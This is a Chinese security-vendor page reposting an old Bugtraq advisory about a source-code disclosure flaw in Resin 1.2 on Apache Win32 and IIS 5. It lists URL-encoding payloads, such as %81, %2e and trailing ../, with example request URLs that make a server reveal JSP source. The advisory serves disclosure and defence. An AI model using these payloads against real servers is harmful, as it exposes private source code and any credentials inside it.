English
 电子信箱
 加入收藏

  威盾防火墙 >> 新闻中心 >> 业界动态 >> [WEB黑客攻防] Resin 1.2 重要源代码暴露漏洞

 

[WEB黑客攻防] Resin 1.2 重要源代码暴露漏洞

威盾防火墙 2014-12-07

 

bugtraq id 1986 
class Input Validation Error 
cve GENERIC-MAP-NOMATCH 
remote Yes 
local Yes 
published November 23, 2000 
updated November 23, 2000 
vulnerable Caucho Technology Resin 1.2
- Microsoft IIS 5.0
+ Microsoft Windows NT 2000
- Apache Group Apache 1.3.6win32

Apache (Win32):
..
%2e..
%81
%82
Example: http://target/filename.jsp%81

Resin Web Server:
../
Example: http://target/filename.jsp../


IIS 5 requesting the URL encoded with ASCII:
'%2' instead of '.'
Example: http://target/filename%2ejsp


相关内容: 最新内容:
防护黑客必学招数 SQL注入拦截-MYIIS-VIF助你一臂之力[2014-12-07]
网银不安全 数字证书防黑客[2014-12-06]
浅析黑客技术和网络安全[2014-12-05]
php is_numberic函数造成的SQL注入漏洞[2014-12-05]
ThinkPHP框架任意代码执行漏洞的利用及其修复方法[2014-12-05]
PHP编程中的常见漏洞和代码实例[2014-12-05]
如何使用MYIIS-VIF来限制和防采集功能 让你的站点少点负担[2014-12-07]
我来教你玩转MYIIS-VIF 防盗链 基础防盗链[2014-12-07]
MYIIS-VIF 常规面板与功能介绍[2014-12-07]
防护黑客必学招数 SQL注入拦截-MYIIS-VIF助你一臂之力[2014-12-07]
SQL Server 2000的安全配置[2014-12-06]
网银不安全 数字证书防黑客[2014-12-06]